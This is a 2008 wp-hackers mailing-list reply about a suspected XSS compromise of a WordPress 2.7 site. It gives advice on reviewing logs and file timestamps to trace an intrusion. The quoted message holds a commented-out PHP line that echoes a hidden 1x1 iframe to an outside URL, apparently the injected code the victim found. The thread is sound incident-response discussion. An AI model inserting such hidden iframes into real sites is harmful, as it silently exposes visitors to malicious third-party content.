[wp-hackers] XSS vuln in wordpress 2.7 ?

Jess Planck jess at funroe.net
Mon Dec 22 19:06:34 GMT 2008


That sux. You started picking through your web logs to see if it came  
through your publicly accessible website? Sometimes you can check  
error and weblogs and look for unusual request strings to determine if  
the exploit came through a vulnerable web application. In some cases  
the intruder will cleanup behind themselves. Unfortunately sometimes  
the exploits don't produce anything log-able.

If they do cleanup, you may notice missing times in log files. At  
least that can give you a time frame if you didn't figure that out  
from the modification stamp on the files.

I didn't notice if you mentioned the server platform. Other WP-Hackers  
may be able to offer some diagnostic tools for your server type.


On Dec 22, 2008, at 12:39 PM, madalin wrote:

> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";



More information about the wp-hackers mailing list